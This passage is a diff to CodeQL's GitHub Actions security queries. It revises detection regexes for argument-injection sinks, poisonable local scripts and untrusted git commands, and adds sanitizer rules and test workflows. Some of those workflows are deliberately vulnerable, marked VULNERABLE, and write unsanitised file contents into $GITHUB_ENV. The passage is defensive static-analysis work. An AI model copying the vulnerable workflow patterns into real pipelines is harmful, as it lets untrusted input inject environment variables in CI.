/** * MaD models for poisonable commands * Fields: @@ -59,9 +55,7 @@ private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$ predicate poisonableCommandsDataModel(string regexp) { exists(string sub_regexp | Extensions::poisonableCommandsDataModel(sub_regexp) and - // find regexp - regexp = - commandPrefixDelimiter() + commandLauncher() + sub_regexp + "(.*?)" + commandSuffixDelimiter() + regexp = commandLauncher() + sub_regexp + ".*" ) } @@ -74,10 +68,7 @@ predicate poisonableCommandsDataModel(string regexp) { predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { exists(string sub_regexp | Extensions::poisonableLocalScriptsDataModel(sub_regexp, command_group) and - // capture regexp - regexp = - ".*" + commandPrefixDelimiter() + commandLauncher() + sub_regexp + commandSuffixDelimiter() + - ".*" + regexp = commandLauncher() + sub_regexp + ".*" ) } @@ -91,8 +82,7 @@ predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and - // capture regexp - regexp = ".*" + commandPrefixDelimiter() + sub_regexp // + commandSuffixDelimiter() + ".*" + regexp = commandLauncher() + sub_regexp ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b30fd5495ed3..a9967a72ee6e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -100,10 +100,10 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { ) and this.asExpr() = run.getScript() and checkout.getAFollowingStep() = run and - run.getScript().getACommand() = cmd and + run.getScript().getAStmt() = cmd and cmd.indexOf("git") = 0 and untrustedGitCommandsDataModel(cmd_regex, flag) and - cmd.regexpMatch(cmd_regex) + cmd.regexpMatch(".*" + cmd_regex + ".*") ) } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 214e97fed6ba..13d6312b5856 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -9,17 +9,17 @@ import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } +string sanitizerCommand() { + result = + [ + "tr\\s+(-d\\s*)?('|\")?.n('|\")?", // tr -d '\n' ' ', tr '\n' ' ' + "tr\\s+-cd\\s+.*:alpha:", // tr -cd '[:alpha:_]' + "(head|tail)\\s+-n\\s+1" // head -n 1, tail -n 1 + ] +} + /** * Holds if a Run step declares an environment variable with contents from a local file. - * e.g. - * run: | - * cat test-results/.env >> $GITHUB_ENV - * - * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV - * echo "sha=$(> $GITHUB_ENV - * - * FOO=$(cat test-results/sha-number) - * echo "FOO=$FOO" >> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { @@ -31,11 +31,19 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( - exists(string cmd | - run.getScript().getACmdReachingGitHubEnvWrite(cmd, _) and - run.getScript().getAFileReadCommand() = cmd + // eg: + // echo "SHA=$(cat test-results/sha-number)" >> $GITHUB_ENV + // echo "SHA=$(> $GITHUB_ENV + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string cmd, string var, string sanitizer | + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubEnvWrite(cmd, var) and + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) ) or + // eg: cat test-results/.env >> $GITHUB_ENV run.getScript().fileToGitHubEnv(_) ) ) @@ -51,9 +59,18 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { EnvVarInjectionFromCommandSink() { - exists(CommandSource source | + exists(CommandSource source, Run run, string var | this.asExpr() = source.getEnclosingRun().getScript() and - source.getEnclosingRun().getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), _) + run = source.getEnclosingRun() and + run.getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), var) and + ( + not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + or + exists(string sanitizer | + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) + ) + ) ) } } @@ -68,10 +85,18 @@ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, string var_name | + exists(Run run, string var_name, string var | exists(run.getInScopeEnvVarExpr(var_name)) and run.getScript() = this.asExpr() and - run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, _) + run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, var) and + ( + not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + or + exists(string sanitizer | + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) + ) + ) ) } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 85932181aed5..0cc8f9131667 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -3,22 +3,15 @@ import codeql.actions.config.Config abstract class PoisonableStep extends Step { } -private string dangerousActions() { - exists(string action | - poisonableActionsDataModel(action) and - result = action - ) -} - class DangerousActionUsesStep extends PoisonableStep, UsesStep { - DangerousActionUsesStep() { this.getCallee() = dangerousActions() } + DangerousActionUsesStep() { poisonableActionsDataModel(this.getCallee()) } } class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - this.getScript().getACommand().regexpMatch("^" + regexp + ".*") + this.getScript().getACommand().regexpMatch(regexp) ) } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index e9bf1edfe7da..c9a78f6d0b6b 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -53,7 +53,7 @@ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { exists(Uses uses | uses.getCallee() = "actions/checkout" and - uses.getArgumentExpr("ref") = sink.asExpr() + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() ) } @@ -99,7 +99,7 @@ private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { exists(Uses uses | uses.getCallee() = "actions/checkout" and - uses.getArgumentExpr("ref") = sink.asExpr() + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() ) } @@ -199,7 +199,7 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ( exists(ActionsMutableRefCheckoutFlow::PathNode sink | ActionsMutableRefCheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr("ref") + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) ) or // heuristic base on the step id and field name @@ -243,7 +243,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ( exists(ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr("ref") + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) ) or // heuristic base on the step id and field name diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 95f813131685..56fced44da8b 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -5,12 +5,11 @@ extensions: # https://gtfobins.github.io/ # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection data: - - ["(awk)\\s(.*?)", 2, 3] - - ["(curl)\\s(.*?)", 2, 3] - - ["(find)\\s(.*?)", 2, 3] - - ["(git)\\s(.*?)", 2, 3] - - ["(sed)\\s(.*?)", 2, 3] - - ["(tar)\\s(.*?)", 2, 3] - - ["(wget)\\s(.*?)", 2, 3] - - ["(zip)\\s(.*?)", 2, 3] + - ["(awk)\\s(.*?)", 1, 2] + - ["(find)\\s(.*?)", 1, 2] + - ["(git clone)\\s(.*?)", 1, 2] + - ["(sed)\\s(.*?)", 1, 2] + - ["(tar)\\s(.*?)", 1, 2] + - ["(wget)\\s(.*?)", 1, 2] + - ["(zip)\\s(.*?)", 1, 2] diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index aa5148d7cf63..addadd75c879 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -63,12 +63,12 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(\\.\\/[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] - - ["(\\.\\s+[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] # eg: . venv/bin/activate - - ["(source|sh|bash|zsh|fish)\\s+(.*?)", 3] - - ["(node)\\s+(.*?)(\\.js|\\.ts)(.*?)", 3] - - ["(python)\\s+(.*?)\\.py(.*?)", 3] - - ["(ruby)\\s+(.*?)\\.rb(.*?)", 3] - - ["(go)\\s+(generate|run)\\s+(.*?)\\.go(.*?)", 4] - - ["(dotnet)\\s+(.*?)\\.csproj(.*?)", 3] + - ["(\\.\\/[^\\s]+)\\b", 1] # eg: ./venv/bin/activate + - ["(\\.\\s+[^\\s]+)\\b", 1] # eg: . venv/bin/activate + - ["(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b", 2] + - ["(node)\\s+([^\\s]+)(\\.js|\\.ts)\\b", 2] + - ["(python)\\s+([^\\s]+)\\.py\\b", 2] + - ["(ruby)\\s+([^\\s]+)\\.rb\\b", 2] + - ["(go)\\s+(generate|run)\\s+([^\\s]+)\\.go\\b", 3] + - ["(dotnet)\\s+([^\\s]+)\\.csproj\\b", 2] diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_commands.yml index 0d6c9e3bfa0a..b4b96a4af43e 100644 --- a/ql/lib/ext/config/untrusted_git_commands.yml +++ b/ql/lib/ext/config/untrusted_git_commands.yml @@ -4,29 +4,29 @@ extensions: extensible: untrustedGitCommandsDataModel data: # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) - - [".*git\\b.*\\bdiff-tree\\b.*", "filename,multiline"] + - ["git\\b.*\\bdiff-tree\\b", "filename,multiline"] # CHANGES=$(git --no-pager diff --name-only $NAME | grep -v -f .droneignore); # CHANGES=$(git diff --name-only) - - [".*git\\b.*\\bdiff\\b.*", "filename,multiline"] + - ["git\\b.*\\bdiff\\b", "filename,multiline"] # COMMIT_MESSAGE=$(git log --format=%s -n 1) - - [".*git\\b.*\\blog\\b.*%s.*", "text,online"] + - ["git\\b.*\\blog\\b.*%s", "text,online"] # COMMIT_MESSAGE=$(git log --format=%B -n 1) - - [".*git\\b.*\\blog\\b.*%B.*", "text,multiline"] + - ["git\\b.*\\blog\\b.*%B", "text,multiline"] # COMMIT_MESSAGE=$(git log --format=oneline) - - [".*git\\b.*\\blog\\b.*oneline.*", "text,oneline"] + - ["git\\b.*\\blog\\b.*oneline", "text,oneline"] # COMMIT_MESSAGE=$(git show -s --format=%B) # COMMIT_MESSAGE=$(git show -s --format=%s) - - [".*git\\b.*\\bshow\\b.*-s.*%s.*", "text,oneline"] - - [".*git\\b.*\\bshow\\b.*-s.*%B.*", "text,multiline"] + - ["git\\b.*\\bshow\\b.*-s.*%s", "text,oneline"] + - ["git\\b.*\\bshow\\b.*-s.*%B", "text,multiline"] # AUTHOR=$(git log -1 --pretty=format:'%an') - - [".*git\\b.*\\blog\\b.*%an.*", "username,oneline"] + - ["git\\b.*\\blog\\b.*%an", "username,oneline"] # AUTHOR=$(git show -s --pretty=%an) - - [".*git\\b.*\\bshow\\b.*%an.*", "username,oneline"] + - ["git\\b.*\\bshow\\b.*%an", "username,oneline"] # EMAIL=$(git log -1 --pretty=format:'%ae') - - [".*git\\b.*\\blog\\b.*%ae.*", "email,oneline"] + - ["git\\b.*\\blog\\b.*%ae", "email,oneline"] # EMAIL=$(git show -s --pretty=%ae) - - [".*git\\b.*\\bshow\\b.*%ae.*", "email,oneline"] + - ["git\\b.*\\bshow\\b.*%ae", "email,oneline"] # BRANCH=$(git branch --show-current) - - [".*git\\b.*\\bbranch\\b.*\\b--show-current\\b.*", "branch,oneline"] + - ["git\\b.*\\bbranch\\b.*\\b--show-current\\b", "branch,oneline"] # BRANCH=$(git rev-parse --abbrev-ref HEAD) - - [".*git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b.*", "branch,oneline"] + - ["git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b", "branch,oneline"] diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected index d5536ca1c74d..12092de34ef9 100644 --- a/ql/test/library-tests/commands.expected +++ b/ql/test/library-tests/commands.expected @@ -92,24 +92,23 @@ | .github/workflows/multiline2.yml:78:9:85:6 | Run Step | tee -a "$GITHUB_ENV" | | .github/workflows/multiline2.yml:85:9:89:35 | Run Step | echo 'JSON_RESPONSE< | | .github/workflows/multiline2.yml:85:9:89:35 | Run Step | tee -a "$GITHUB_ENV" | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog< event.json | @@ -124,33 +123,30 @@ | .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | sed 's/l/e/g' > file.txt | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV + - run: | + # VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -d '\n')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -cd '[:alpha:]_')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tail -n 1)" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | head -n 1)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 220eaf336637..a79053f2240e 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,6 +1,4 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | @@ -29,17 +27,15 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | nodes -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | @@ -92,13 +88,14 @@ nodes | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | 